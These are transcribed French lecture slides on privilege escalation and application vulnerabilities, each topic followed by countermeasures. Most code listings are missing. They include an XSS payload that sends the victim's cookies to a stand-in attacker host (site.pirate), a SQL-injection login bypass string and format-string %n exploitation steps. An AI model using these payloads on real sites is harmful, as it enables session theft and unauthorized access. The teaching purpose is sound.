Sécurité des systèmes informatiques Escalade des privilèges

Transcription

1 Année Sécurité des systèmes informatiques Escalade des privilèges Nicolas Baudru mél : nicolas.baudru@esil.univmed.fr page web : nicolas.baudru.esil.perso.univmed.fr 1

2 Mise en garde Ce cours a uniquement pour but de vous montrer comment une mauvaise implémentation d un programme peut le rendre vulnérable à une attaque. Nous déclinons toute responsabilité quant à la mauvaise utilisation de ce cours. L utilisation des différentes attaques décrites dans ce cours peut être sanctionnée jusqu à trois ans de prison et soixante quinze mille euros d amende. 2

3 Sécuriser les systèmes informatiques Introduction La sécurité des ordinateurs consiste à développer des solutions pour : préserver l intégrité d un système ; garantir la disponibilité d un système ou d un service ; maintenir la confidentialité des données Autrement dit, il faut pouvoir faire face aux attaques suivantes : intrusion ; déni de service ; escalade des privilèges. 3

4 Introduction La base de la sécurité : la division des privilèges Aucun système ne peut être parfaitement sûr car ses utilisateurs ne le sont pas. il est nécessaire de protéger chaque utilisateur des autres, ce qui conduit au principe de division des privilèges. La division des privilèges nécessite : une protection logicielle entre les utilisateurs : identification (qui ils sont) et authentification (il faut le prouver). une protection matérielle au niveau du noyau : l architecture de l ordinateur doit rendre possible la division des privilèges en séparant l espace mémoire du noyau de l espace mémoire des utilisateurs (appels systèmes nécessaires pour effectuer des actions sensibles). 4

5 Vulnérabilités applicatives Introduction De nombreuses applications sont vulnérables à cause d une mauvaise programmation, souvent involontaire (négligeance, manque de temps,...), et parfois intentionnelles. Toutes les applications peuvent être touchées! Les solutions contre ces vulnérabilités sont souvent simples à mettre en oeuvre : utilisation de fonctions sécurisées validation des chaînes de caractères récupérées en entrée techniques d échappement des caractères spéciaux activation de certaines protections systèmes etc. La détection de ces failles est cependant assez difficile et nécessite souvent un audit approfondi et des tests de sécurité. 5

6 Plan Introduction 1 Vulnérabilité des mots de passe 2 Buffer overflow 3 Format string 4 Race condition 5 XSS 6 Injection SQL 7 Faille include() 8 Faille system() 6

7 Plan Vulnérabilité des mots de passe 1 Vulnérabilité des mots de passe 2 Buffer overflow 3 Format string 4 Race condition 5 XSS 6 Injection SQL 7 Faille include() 8 Faille system() 7

8 Nom d'utilisateur et mot de passe Vulnérabilité des mots de passe Sur les systèmes modernes multi-utilisateurs, il est nécessaire de s authentifier pour accéder à l OS. Pour cela on utilise généralement une paire <login mot de passe> Un mot de passe est une succession arbitraire de lettres et de chiffres de longueur finie (généralement 6 à 8 caractères) authentifiant un utilisateur. Les mots de passe sont encodés et placés dans des fichiers à accès limité. Le codage utilisé peut être réversible ou non. Les méthodes les plus utilisées sont DES (Data Encryption Standard) et MD5. Remarque : l authentification peut être obtenue par d autres mécanismes tels que les systèmes à cartes à puce (souvent couplés avec un mot de passe) ou la biométrie. 8

9 Vulnérabilité des mots de passe Stockage du mot de passe dans le modèle UNIX login = UID Un UID est un nombre entier non signé sur 16 bits (en général). A chaque UID est associé un mot de passe utilisateur. Le triplet <nom d utilisateur / UID / mot de passe> était traditionnellement enregistré dans le fichier /etc/passwd : ce fichier est lisible par tous ; les mots de passe y sont encodés (généralement par la méthode DES) ; les mots de passe sont vulnérables aux attaques par dictionnaire. Maintenant, les mots de passe sont enregistrés dans /etc/shadow : le fichier /etc/passwd ne contient plus les mots de passe ; le fichier /etc/shadow est lisible par le root uniquement ; ce dernier fichier permet des schémas d expiration et le remplacement automatique des mots de passe est possible. L authentification s effectue en comparant le mot de passe encodé donné par l utilisateur à celui du fichier /etc/passwd (ou shadow). 9

10 Vulnérabilité des mots de passe Le principe du cryptage dans le modèle UNIX char* crypt(const char *key, const char *setting) ; La chaîne key (le mot de passe) est utilisée pour chiffrer suivant l algorithme DES un bloc de 64 bits tous mis à 0. Le tableau de caractères setting, lorsqu il ne comprend que deux caractères (seulement 12 bits sont utilisés réellement), est appelé salt (sel) et permet d introduire du désordre à l algorithme DES. deux mots de passe identiques seront codés différemment. Le résultat de cette fonction est une chaîne de 64 bits (provenant de 25 codages successifs) stockée sous la forme de 11 caractères imprimables. Deux caractères suplémentaires (provenant du sel) sont placés devant les 11 caractères. Le tout (les 13 caractères) constitue le mot de passe codé stocké dans le fichier /etc/passwd. 10

11 Les attaques des mots de passe Vulnérabilité des mots de passe Attaque par dictionnaire : un programme tente de deviner le mot de passe d un utilisateur en se basant sur ses informations personnelles (nom/prénom, login) et des mots des dictionnaires qu on lui fournit. Se protéger des attaques par dictionnaire : Enregistrer les mots de passe dans le fichier shadow plutôt que passwd. Le choix du mot de passe est important. Il faut éviter : les mots du dictionnaire ; les mots ayant un rapport avec l utilisateur (nom du chien par exemple) ; les suites de lettres formant une combinaison simple sur le clavier (une partie d une ligne) ; etc. Un bon mot de passe doit pouvoir être mémorisé par l utilisateur. Pour une sécurité optimale, le mot de passe doit être changé suffisamment souvent. 11

12 Les attaques des mots de passe Vulnérabilité des mots de passe Attaque par renifleurs : lors d une connexion à distance en utilisant rlogin ou telnet, il est possible d intercepter le login et le mot de passe en clair. (voir aussi la partie sur la vulnérabilité des réseaux) Se protéger des renifleurs : Utiliser des sessions sécurisées type ssh ou Kerberos. Utiliser des mots de passe jetables (one time passwords) choisis parmi une liste de mots de passe obtenus via une carte à cristaux liquides etc 12

13 Plan Buffer overflow 1 Vulnérabilité des mots de passe 2 Buffer overflow 3 Format string 4 Race condition 5 XSS 6 Injection SQL 7 Faille include() 8 Faille system() 13

14 Présentation Buffer overflow Le dépassement de tampon (ou de pile, ou de tas) est une technique ancienne, bien connue, et encore très utilisée exploitant une faille du programme pour en prendre le contrôle. Elle consiste à faire déborder un tampon sur la pile afin d injecter (et exécuter) du code malveillant. Pour que cette faille aparaîsse, il suffit que le programmeur stocke ses données dans un tableau sans en vérifier la longueur. L exemple suivant est décrit en détaille dans l article intitulé Dépassement de pile sous Linux x86 disponible sur le site 14

15 Dépassement de tableau Buffer overflow Exemple : Se programme peut provoquer à l exécution un segmentation fault. Pourquoi? À quel moment de l exécution exactement? pour répondre précisément à ces questions il faut bien comprendre le fonctionnement de la pile. 15

16 Rappel : fonctionnement de la pile (1) Buffer overflow 16

17 Rappel : fonctionnement de la pile (2) Buffer overflow 17

18 Rappel : fonctionnement de la pile (3) Buffer overflow 18

19 Rappel : fonctionnement de la pile (4) Buffer overflow 19

20 Rappel : fonctionnement de la pile (5) Buffer overflow 20

21 Exploiter la faille Buffer overflow Revenons à notre buffer. Celui-ci occupe dans la pile 10 octets. Si la chaîne de caractères lue est trop longue, elle va dépasser du tableau, et peut aller jusqu à écraser l adresse de retour : c est ce qui provoque le segmentation fault. C est ici qu est la faille. En effet en choisissant bien l entrée, on peut écraser l adresse de retour par une autre adresse valide pointant sur une case du buffer. Remarque : on peut facilement déterminer l adresse où est stockée l adresse de retour de la fonction en utilisant un debugger. 21

22 Exploiter la faille (suite) Buffer overflow L écrasement de l adresse de retour va être utilisé pour provoquer l exécution du shell /bin/sh commun à toutes les distributions Unix et Linux. En C, il faudrait utiliser l instruction : execve(argv[0],/bin/sh,null). Puisque cette instruction doit être placée directement dans la pile, on va générer du code assembleur de cette instruction, par exemple : On peut vérifier que ce shellcode est correct : 22

23 Exploiter la faille (n) Buffer overflow Il ne reste alors qu à injecter le shellcode dans l appplication : 23

24 Buffer overflow Se protéger des dépassement de tableaux Au niveau de l application : toujours vérifier la longueur des données reçues utiliser les fonctions avec contrôle de longueur : gets(str) fgets(stdin, str, 10) scanf(%s, str) scanf(%10s, str) Au niveau du compilateur : changer l emplacement du buffer à chaque démarage du programme. placer un canary devant chaque adresse de retour. Au niveau de l OS : la pile peut être rendue non exécutable. Exemple : patch PaX pour Linux ; dans Solaris, ajout dans /etc/system des lignes : set noexec_user_stack=1 set noexec_user_stack_log=1 Remarque : Il est possible de contourner plusieurs de ces protections en utilisant la technique du return-to-libc. 24

25 Plan Format string 1 Vulnérabilité des mots de passe 2 Buffer overflow 3 Format string 4 Race condition 5 XSS 6 Injection SQL 7 Faille include() 8 Faille system() 25

26 Chaînes de format Format string En C, les chaînes de format sont des chaînes de caractères contenant des spécificateurs reconnus par les fonctions de type printf(). Elles permettent de formater l affichage des arguments passés à la fonction. Exemple : 26

27 Quelques spécicateurs de format Format string Exemple : spécificateur résultat passé par %d nombre entier valeur %f floatant valeur %x naturel en hexadécimal valeur %c caractère valeur %s chaîne de caractères référence %n nombre de caractères écrits jusqu à présent référence 27

28 direction de la pile Format string Fonctionnement des chaînes de format (1) Contenu de la pile après l exécution du printf() dans le cas normal : variables locales de la fonction d'appel (ici main()). Contient les variables nb x... direction des adresses pointeur vers la variable nb (utilisé par %n) pointeur vers la variable x (utilisé par %s) pointeur vers la chaîne de format arguments de la fonction printf() adresse de retour de la fonction printf() 28

29 Format string Fonctionnement des chaînes de format (2) Que se passe-t-il si on oublie de passer un argument à printf()? Exemple : 29

30 direction de la pile Format string Fonctionnement des chaînes de format (3) Que se passe-t-il si on oublie de passer un argument à printf()? Explication : contenu de la pile après l exécution du premier printf() : direction des adresses variables locales de la fonction d'appel (ici main()). Contient entre autres la variable x. argument utilisé par défaut par le spécificateur %s. Contient 0x?? pointeur vers la chaîne de format adresse de retour de la fonction printf() arguments de la fonction printf() 30

31 Format string Fonctionnement des chaînes de format (4) Oublier des arguments dans printf() peut provoquer des erreurs à l exécution! Exemple : 31

32 direction de la pile Format string Fonctionnement des chaînes de format (5) Oublier des arguments dans printf() peut provoquer des erreurs à l exécution! Explication : Contenu de la pile après l exécution du deuxième printf() : variables locales de la fonction d'appel (ici main()). Contient entre autres les variables x et nb. direction des adresses argument utilisé par défaut par le spécificateur %n. Contient 0x?? pointeur vers la variable x pointeur vers la chaîne de format arguments de la fonction printf() Case mémoire 0x?? non accessible au processus => erreur adresse de retour de la fonction printf() 32

33 direction de la pile Format string La faille On peut utiliser la fonction printf() et son spécificateur %n pour modifier la valeur d une variable locale de la fonction main(). variables locales du main() variables locales du main() direction des adresses... nb... &nb nb... &nb utilisé par %n arguments utilisés par un nombre assez grand de spécificateurs %x pointeur vers la chaîne de format adresse de retour de printf() arguments de la fonction printf() -- ETAPE 1 -- mettre dans la pile l'adresse de la variable nb -- ETAPE 2 -- appeler la fonction printf() avec une chaîne de format "assez longue" du type %x %x... %x %n 33

34 Exploiter la faille Format string 34

35 Mise en oeuvre Format string Essayons maintenant de cracker un petit programme aussi simple qu inutile ;) On veut de nouveau modifier la valeur de nb... mais sans toucher au code. 35

36 direction de la pile Mise en oeuvre Etape 1 Format string On examine le contenu de la pile après l exécution du premier printf() : variables locales du main() direction des adresses f[0-3] = AAAA = 0x nb = 7 = 0x x8fe34eb3 0 0xbffffc4a pointeur vers la chaîne de format adresse de retour de printf() 36

37 Mise en oeuvre Etape 2 Format string On place dans la pile l adresse de nb en lieu et place de AAAA : Remarques : 1. La commande shell echo -e '\xbf\x\xf1\x6c' Les apostrophes inverses ( ) Attention à l architecture little endian 4. L adresse de la variable nb a changé à cause de la longueur de la chaîne de caractères f. 37

38 Mise en oeuvre Etape 2 (suite) Format string On place dans la pile l adresse de nb en lieu et place de AAAA : Remarques : 1. Le spécificateur %8$x permet d afficher directement le 8ième argument 2. On a mis à jour l entrée en tenant compte de la nouvelle adresse et de l architecture little endian. 3. Le 8ième argument est bien l adresse de nb. 38

39 direction de la pile Mise en oeuvre Etape 2 (n) Format string On est donc maintenant dans la situation suivante : variables locales du main() direction des adresses f[0-3] = 0xbffff14c nb = 7 = 0x7?????????????????? pointeur vers la chaîne de format adresse de retour de printf() Donc si l on remplace dans la ligne de commande précédente le spécificateur %8$x par le spécificateur %8$n, le nombre de caractères écrits jusqu à présent sera enregistré dans la variable stockée à l adresse décrite par le 8ième argument, soit nb. 39

40 Mise en oeuvre Etape 3 Format string Au final, il faut entrer la commande suivante : On sait maintenant modifier aléatoirement le contenu de la variable nb. Comment choisir le nombre affecté à cette variable? 40

41 Format string Comment entrer un grand nombre? Méthode 1 En utilisant plus de caractères dans l argument de la ligne de commande : Remarques : L ajout de caractères peut modifier l endroit où est stockée la variable nb. Cette méthode est limitée par la taille du tableau f[2560]. 41

42 Format string Comment entrer un grand nombre? Méthode 2 En utilisant les spécificateurs : par exemple, %13x provoque l affichage de 13 caractères. Remarques : L ajout de caractères peut modifier l endroit où est stockée la variable nb. Méthode pas très subtile. 42

43 Format string Comment entrer un grand nombre? Méthode 3 En utilisant la façon dont sont stockés les entiers en mémoire. 43

44 direction de la pile Format string Comment entrer un grand nombre? Méthode 3 (suite) direction des adresses 0Xbffffbac 0Xbffffba8 variables locales du main() f nb 0Xbffffbab 0Xbffffbaa 0Xbffffba9 0Xbffffba8 f a4 bc 7f 44

45 Format string Comment entrer un grand nombre? Méthode 3 (encore) 0Xbffffbab 0Xbffffbaa 0Xbffffba9 entier nb à l'adresse 0Xbffffba8 variables locales du main() variable f f a4 bc 7f f bc a f entier à entier à l'adresse entier à l'adresse 0Xbffffbab entier à l'adresse 0Xbffffbaa l'adresse 0Xbffffba9 0Xbffffba8 45

46 Format string Comment entrer un grand nombre? Méthode 3 (toujours) variables locales du main() variable f 0Xbffffbac variable nb 0Xbffffba8 0Xbffffbab 0Xbffffbaa 0Xbffffba9 0Xbffffba8 pointeur vers la chaîne de format adresse de retour de printf f bc a f entier à entier à l'adresse entier à l'adresse 0Xbffffbab entier à l'adresse 0Xbffffbaa l'adresse 0Xbffffba9 0Xbffffba8 46

47 Format string Comment entrer un grand nombre? Méthode 3 (n) Au final nous obtenons la ligne de commande suivante : Remarque : L ajout de caractères a modifié l endroit où est stockée la variable nb. 47

48 Format string Comment se servir de ce type de vulnérabilité Exemple : Fonctionnement normal du programme PILE (...) GOT (...) pointeur vers fonction_lib (...) (...) variable ch (...) LA BIBLIOTHÈQUE (...) fonction_lib() (...) Autre_fonction() (...) PROGRAMME (...) printf(ch); (...) fonction_lib(ch); (...) Fonctionnement du programme après crackage PILE (...) GOT (...) pointeur vers Autre_fonction (...) (...) variable ch contenant notre chaîne de format (...) On peut modifier la valeur du pointeur vers fonction_lib de manière à pointer vers une autre fonction système qui nous intéresse. 48

49 Se protéger Format string Au niveau de l application : attention aux erreurs qui permettent de transmettre une chaîne de format quelques outils existent pour se protéger contre ce type de vulnérabilité : pscan, Flawfinder, RATS, ITS4,... + protections similaires à celles utilisées pour le buffer overflow. 49

50 Plan Race condition 1 Vulnérabilité des mots de passe 2 Buffer overflow 3 Format string 4 Race condition 5 XSS 6 Injection SQL 7 Faille include() 8 Faille system() 50

51 Présentation Race condition Faille peu exploitée mais redoutable. Elle consiste à détourner l utilisation d une application setuid pour permettre à un utilisateur Unix de s élever les droits d un fichier. Cette faille utilise : les droits spéciaux tels que setuid, getuid et sticky bit ; les liens symboliques ; le plus souvent les fichiers créés dans le repertoire /temp ; l accès concurrent à ces fichiers par des processus appartenant à des utilisateurs distincts. Cette faille devient redoutable lorsque le lien pointe vers un fichier système critique (du style /etc/shadow) et que l application est setuid root. 51

52 Race condition Droits spéciaux : setuid, getuid et sticky bit Pour les fichiers : setuid : utiliser l ID du propriétaire du fichier lors de l exécution ; getuid : utiliser l ID du groupe propriétaire du fichier lors de l exécution ; sticky bit : conserver le code du programme sur le périphérique de swap après exécution. Pour les répertoires : sticky bit : indique que seuls le propriétaire du répertoire et le propriétaire d un fichier qui s y trouve ont le droit de supprimer ce fichier. 52

53 Race condition Comment s'éléver les droits sur un chier? Exemple : À l exécution : 53

54 Race condition Comment s'éléver les droits sur un chier? (suite) Un premier test... 54

55 Race condition Comment s'éléver les droits sur un chier? (n) Pour exploiter la faille il suffit d utiliser les liens symboliques... Remarque : dans le cas d un fichier temporaire, l application doit être tuée avant qu elle n efface ce fichier. 55

56 Race condition Première étape pour améliorer la sécurité Ne pas utiliser de noms de fichiers temporaires faciles à deviner ; Vérifier si le fichier à créer existe déjà, ou la présence d un lien vers ce fichier : Mais cela ne suffit pas! 56

57 Race condition Race condition Processus RCListing2 : processus P : préemption de RCListing2 activation de P création du lien chier_temp.txt vers chier_perso.txt activation de RCListing2 préemption de P 57

58 Augmenter la sécurité Race condition En plus des mesures précédentes : créer un sous-répertoire dans le répertoire /temp avec un accès limité, et utiliser des noms de fichiers temporaires arbitraires (voir la fonction C mkstemp (3)) placés à l intérieur de ce répertoire. 58

59 Plan XSS 1 Vulnérabilité des mots de passe 2 Buffer overflow 3 Format string 4 Race condition 5 XSS 6 Injection SQL 7 Faille include() 8 Faille system() 59

60 Présentation XSS Cross-Site Scripting (XSS ou CSS) : attaque consistant à forcer un site web à afficher du code HTML ou des scripts saisis par les utilisateurs. Cette attaque touche les sites webs affichant dynamiquement du contenu utilisateur sans effectuer de contrôle des informations saisies par les utilisateurs. Le code est injecté via l URL. Risques : il est possible d afficher du code HTML supplémentaire et malicieux dans une page web vulnérable afin de changer son aspect, modifier son contenu (ajouter des liens vers des sites malveillants) modifier son comportement (récupérer des cookies et des données confidentielles). 60

61 Comment exploiter cette faille XSS La plupart des navigateurs modernes interprètent des scripts contenus dans les pages web tels que JavaScript, VBScript, ActiveX ou Flash par l intermédiaire des balises HTML suivantes : <SCRIPT> <OBJECT> <APPLET> <EMBED>. Conséquence : il est possible d injecter du code arbitraire dans la page web, afin que celui-ci soit exécuté sur le poste de l utilisateur. si le navigateur de l utilisateur est configuré pour exécuter de tels scripts, alors le code malicieux a accès à l ensemble des données partagées par la page web de l utilisateur et le serveur (cookies, champs de formulaires, etc.). 61

62 Comment exploiter cette faille (suite) XSS Exemple : Le message est transmis via l URL : http :// word 62

63 Comment exploiter cette faille (n) XSS Exemple : <SCRIPT> document.location='http ://site.pirate/volecookie.php?cookie='+document.cookie </SCRIPT> Le code ci-dessus récupère les cookies de l utilisateur et les transmet au pirate : http :// ='http ://site.pirate/volecookie.php?cookie='+document.cookie</script> encodage de l URL pour masquer l attaque : http :// %64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e... 63

64 Deux types de failles XSS XSS Faille non permanente : apparaît lorsque les données fournies par un utilisateur sont directement utilisées par le serveur pour fournir une page de résultat personnalisée au client ; l attaque reste locale ; l attaque doit être couplée avec des techniques d ingénierie sociale (social engineering) pour être effective. Faille permanente : apparaît lorsque les données entrées par un utilisateur sont stockées sur un serveur, puis réaffichées (ex : blog, forums, etc) ; Cette attaque est très puissante puisqu elle touche un grand nombre de personnes simultanément sans avoir recours à l ingénierie sociale. 64

65 Exemple XSS 1. Un utilisateur malfaisant envoie un courriel à la victime qui contient un script javascript 2. La victime se connecte à l application webmail en entrant son code utilisateur et mot de passe via SSL 3. Le serveur envoie un cookie au client contenant un identificateur unique de session. 4. L utilisateur lit le message malfaisant qui est affiché tel quel 5. Le javascript s exécute, récupère le cookie contenant la session, et redirige le client vers un serveur malfaisant en envoyant à celui-ci la session en paramètre 6. Le serveur malfaisant reçoit la session de la victime et redirige le client vers la page précédente 7. L utilisateur malfaisant peut maintenant accéder au compte webmail et effectuer un vol d identité 65

66 Protection contre le XSS XSS Chez l utilisateur : Désactiver l exécution des langages de scripts. (Très contraignant mais efficace). Au niveau du site web : Cacher les variables dans l URL en utilisant des techniques d URL rewriting ; Vérifier le format des données entrées par les utilisateurs ; Encoder les données utilisateurs affichées en échappant les caractères spéciaux (utilisation des fonctions htmlentities() ou htmlspecialchars() en PHP). 66

67 Plan Injection SQL 1 Vulnérabilité des mots de passe 2 Buffer overflow 3 Format string 4 Race condition 5 XSS 6 Injection SQL 7 Faille include() 8 Faille system() 67

68 Présentation Injection SQL Faille touchant les sites Webs interagissant de manière non sécurisée avec une base de données. Son principe est de détourner les requêtes SQL pour obtenir par exemple : un accès à des pages ou des données confidentielles ; créer des fichiers sur le serveur ; obtenir des informations sur le serveur ou les bases de données. 68

69 Injections SQL (suite) Injection SQL Exemple : Où est la faille? 69

70 Injections SQL (n) Injection SQL La faille : Imaginons que nous rentrons pour $_POST["login"] ceci : Alors la requête SQL devient : a' OR 'a'='a'# Sécuriser la faille : utiliser l URL rewriting ; utiliser la fonction mysql_real_escape_string(), fournie par l API, pour échapper les caractères ; ne pas oublier de mettre des même autour des nombres. 70

71 Plan Faille include() 1 Vulnérabilité des mots de passe 2 Buffer overflow 3 Format string 4 Race condition 5 XSS 6 Injection SQL 7 Faille include() 8 Faille system() 71

72 Présentation Faille include() C est une faille PHP très connue due à une erreur de programmation, qui exploite les fonctions du type include(), require(),... Ces fonctions permettent d inclure un fichier et d exécuter son contenu. Exemple : où l URL ressemble à index.php?page=lm.php 72

73 Exploiter la faille Faille include() La faille : la fonction include() ne vérifie pas si la page existe localement. Cela permet de créer des backdoors pour, par exemple : lire le source de la page lister les dossiers du sites, placer des chevaux de Troie pour récupérer un login\pass et même afficher des fichiers normalement protégés comme.htpasswd, /etc/shadow (si le serveur fonctionne en root, on peut toujours réver ;),... 73

74 Se protéger Faille include() Sécuriser la faille : toujours vérifier si les pages à inclure sont bien sur le serveur ; encore mieux : créer un tableau répertoriant les pages que l on peut inclure. 74

75 Plan Faille system() 1 Vulnérabilité des mots de passe 2 Buffer overflow 3 Format string 4 Race condition 5 XSS 6 Injection SQL 7 Faille include() 8 Faille system() 75

76 Présentation Faille system() La fonction system() de Linux permet d exécuter une commande passée en argument. Cette commande est recherchée à l aide des variables d environnement PATH et IFS. Sur certaines versions Linux, cela crée une vulnérabilité dès lors que le programme appelant la fonction system() est Set-UID. 76

77 Exploiter la faille Faille system() Rappels : La variable PATH contient une liste de répertoires où rechercher un programme séparés par :. PATH=/bin :/usr/bin :/home/bob La variable IFS contient le caractère de séparation des arguments d un programme. La faille : Si la fonction system() fait appel à un programme /bin/prog1 alors il suffit de créer un programme bin dans notre répertoire courant, placer le répertoire courant au début de la variable PATH, modifier la variable IFS pour que le séparateur d arguments soit /. 77

78 Se protéger Faille system() Il est très facile de sécuriser cette faille : Utiliser une version de Linux où cette faille de sécurité a été corrigée Ne pas utiliser system() mais plutôt les fonctions du type exec(). 78